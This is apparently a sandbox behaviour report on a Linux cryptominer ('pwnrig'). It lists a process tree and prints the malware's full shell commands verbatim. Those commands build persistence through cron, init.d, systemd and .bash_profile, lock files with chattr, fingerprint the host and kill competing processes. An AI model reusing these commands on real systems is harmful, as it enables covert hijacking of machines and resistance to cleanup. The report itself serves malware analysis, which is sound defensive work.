/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib41⤵PID:3317
-
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib41⤵PID:3318
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib41⤵
- Attempts to change immutable files
PID:3319
-
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib41⤵PID:3320
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib41⤵PID:3321
-
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib41⤵PID:3322
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib41⤵PID:3323
-
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib41⤵
- Attempts to change immutable files
PID:3324
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib41⤵PID:3325
-
/usr/bin/chattrchattr -ia /etc/anacrontab1⤵
- Attempts to change immutable files
PID:3326
-
/usr/bin/chattrchattr +ia /etc/anacrontab1⤵PID:3327
-
/tmp/sys-helper/tmp/sys-helper1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:3328
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:3332 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵
- Attempts to change immutable files
PID:3334 -
/usr/bin/whoamiwhoami3⤵PID:3345
-
-
/usr/bin/hostnamehostname3⤵PID:3346
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
PID:3347
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:3363
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:3365
-
-
/usr/bin/psps -A "-ostat,ppid"3⤵PID:3364
-
-
/usr/bin/idid -u3⤵PID:3367
-
-
/usr/bin/grepgrep -v grep3⤵PID:3370
-
-
/usr/bin/grepgrep /etc/cron3⤵PID:3369
-
-
/usr/bin/psps x3⤵
- Reads CPU attributes
- Reads runtime system information
PID:3368
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"2⤵
- Writes file to tmp directory
PID:3372 -
/usr/bin/idid -u3⤵PID:3373
-
-
/usr/bin/idid -u3⤵PID:3376
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"3⤵PID:3377
-
-
/usr/bin/rmrm -rf /bin/bprofr3⤵PID:3378
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"3⤵PID:3379
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr3⤵
- Writes file to system bin folder
PID:3380
-
-
/usr/bin/idid -u3⤵PID:3381
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"3⤵
- Attempts to change immutable files
PID:3382
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly3⤵PID:3383
-
-
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:3384
-
-
/usr/bin/rmrm -rf /bin/crondr3⤵PID:3385
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr3⤵
- Writes file to system bin folder
PID:3386
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
PID:3388
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
PID:3389
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:3390
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:3391
-
-
/usr/bin/whichwhich chkconfig3⤵PID:3392
-
-
/usr/bin/whichwhich update-rc.d3⤵PID:3393
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr3⤵PID:3394
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable3⤵
- Flushes firewall rules
PID:3395 -
/usr/local/sbin/systemctlsystemctl --quiet disable pwnrig4⤵PID:3396
-
-
/usr/local/bin/systemctlsystemctl --quiet disable pwnrig4⤵PID:3396
-
-
/usr/sbin/systemctlsystemctl --quiet disable pwnrig4⤵PID:3396
-
-
/usr/bin/systemctlsystemctl --quiet disable pwnrig4⤵
- Reads EFI boot settings
PID:3396
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:3422
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:3422
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:3422
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
PID:3422
-
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove3⤵PID:3448
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:3449
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:3449
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:3449
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
PID:3449
-
-
-
/usr/bin/rmrm -rf /bin/initdr3⤵PID:3487
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr3⤵
- Writes file to system bin folder
PID:3488
-
-
/usr/bin/teetee /etc/init.d/pwnrig3⤵
- Modifies init.d
PID:3490
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig3⤵
- Modifies init.d
PID:3491
-
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr3⤵PID:3492
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults3⤵PID:3493
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable3⤵PID:3528
-
/usr/local/sbin/systemctlsystemctl --quiet enable pwnrig4⤵PID:3529
-
-
/usr/local/bin/systemctlsystemctl --quiet enable pwnrig4⤵PID:3529
-
-
/usr/sbin/systemctlsystemctl --quiet enable pwnrig4⤵PID:3529
-
-
/usr/bin/systemctlsystemctl --quiet enable pwnrig4⤵
- Reads EFI boot settings
PID:3529
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:3530
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:3530
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:3530
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:3530
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr3⤵PID:3556
-
-
/usr/bin/whichwhich systemctl3⤵PID:3557
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵PID:3558
-
-
/usr/bin/rmrm -rf /bin/sysdr3⤵PID:3559
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr3⤵
- Writes file to system bin folder
PID:3560
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
- Modifies systemd
PID:3562
-
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵PID:3563
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵PID:3564
-
-
/usr/bin/systemctlsystemctl enable pwnrige.service3⤵
- Reads EFI boot settings
PID:3565
-
-
/usr/bin/systemctlsystemctl enable pwnrigl.service3⤵
- Reads EFI boot settings
PID:3591
-
-
/usr/bin/systemctlsystemctl daemon-reload3⤵
- Reads EFI boot settings
PID:3623
-
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service3⤵
- Reads EFI boot settings
PID:3651
-
-
-
/usr/bin/hostnamehostname -I1⤵PID:3337
-
/usr/bin/awkawk "{print \$1}"1⤵PID:3339
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:3344
-
/usr/bin/headhead -n 11⤵PID:3343
-
/usr/bin/grepgrep "Port "1⤵PID:3342
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵PID:3341
-
/usr/bin/sedsed -e "s/\$//"1⤵PID:3353
-
/usr/bin/sedsed -e "s/^ *//"1⤵PID:3352
-
/usr/bin/cutcut -d: -f21⤵PID:3351
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:3350
-
/usr/bin/awkawk "{print \$1}"1⤵PID:3356
-
/usr/bin/awkawk "{print \$4}"1⤵PID:3359
-
/usr/bin/awkawk "{print \$4}"1⤵PID:3362
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:3731 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵PID:3755
-
/usr/bin/whoamiwhoami3⤵PID:3766
-
-
/usr/bin/hostnamehostname3⤵PID:3767
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
PID:3768
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:3784
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:3786
-
-
/usr/bin/psps -A "-ostat,ppid"3⤵
- Reads CPU attributes
PID:3785
-
-
/usr/bin/idid -u3⤵PID:3788
-
-
/usr/bin/grepgrep -v grep3⤵PID:3791
-
-
/usr/bin/grepgrep /etc/cron3⤵PID:3790
-
-
/usr/bin/psps x3⤵
- Reads runtime system information
PID:3789
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:3793
-
/usr/bin/idid -u3⤵PID:3794
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵PID:3799
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd3⤵PID:3798
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"3⤵PID:3797
-
-
/usr/bin/grepgrep -v grep3⤵PID:3796
-
-
/usr/bin/psps aux3⤵
- Reads CPU attributes
- Reads runtime system information
PID:3795
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"2⤵PID:3801
-
/usr/bin/idid -u3⤵PID:3802
-
-
-
/usr/bin/hostnamehostname -I1⤵PID:3758
-
/usr/bin/awkawk "{print \$1}"1⤵PID:3760
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:3765
-
/usr/bin/headhead -n 11⤵PID:3764
-
/usr/bin/grepgrep "Port "1⤵PID:3763
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵PID:3762
-
/usr/bin/sedsed -e "s/\$//"1⤵PID:3774
-
/usr/bin/sedsed -e "s/^ *//"1⤵PID:3773
-
/usr/bin/cutcut -d: -f21⤵PID:3772
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:3771
-
/usr/bin/awkawk "{print \$1}"1⤵PID:3777
-
/usr/bin/awkawk "{print \$4}"1⤵PID:3780
-
/usr/bin/awkawk "{print \$4}"1⤵PID:3783
-
/usr/bin/wcwc -l1⤵PID:3808
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵PID:3807
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵PID:3806
-
/usr/bin/grepgrep -v grep1⤵PID:3805
-
/usr/bin/psps aux1⤵
- Reads CPU attributes
- Reads runtime system information
PID:3804
-
/usr/bin/crontabcrontab -r1⤵PID:3845
-
/usr/bin/pkillpkill -f .klibsystem51⤵
- Reads runtime system information
PID:3846
-
/usr/bin/pkillpkill -f .klibsystem41⤵
- Reads runtime system information
PID:3847
-
/usr/bin/bashbash -c "echo \"* * * * * /usr/local/share/.klibsystem5 >/dev/null 2>&1\" | crontab -"1⤵PID:3848
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:3850
-
-
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib41⤵PID:3851
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib41⤵PID:3852
-
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib41⤵PID:3853
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib41⤵PID:3854
-
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib41⤵PID:3855
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib41⤵PID:3856
-
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib41⤵PID:3857
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib41⤵
- Attempts to change immutable files
PID:3858
-
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib41⤵PID:3859
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib41⤵PID:3860
-
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib41⤵PID:3861
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib41⤵PID:3862
-
/usr/bin/chattrchattr -ia /etc/anacrontab1⤵PID:3863
-
/usr/bin/chattrchattr +ia /etc/anacrontab1⤵PID:3864
-
/tmp/sys-helper/tmp/sys-helper1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:3865
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:3866 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵
- Attempts to change immutable files
PID:3867 -
/usr/bin/whoamiwhoami3⤵PID:3878
-
-
/usr/bin/hostnamehostname3⤵PID:3879
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
PID:3880
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:3896
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:3898
-
-
/usr/bin/psps -A "-ostat,ppid"3⤵
- Reads CPU attributes
PID:3897
-
-
/usr/bin/idid -u3⤵PID:3900
-
-
/usr/bin/grepgrep -v grep3⤵PID:3903
-
-
/usr/bin/grepgrep /etc/cron3⤵PID:3902
-
-
/usr/bin/psps x3⤵
- Reads CPU attributes
PID:3901
-
-
-
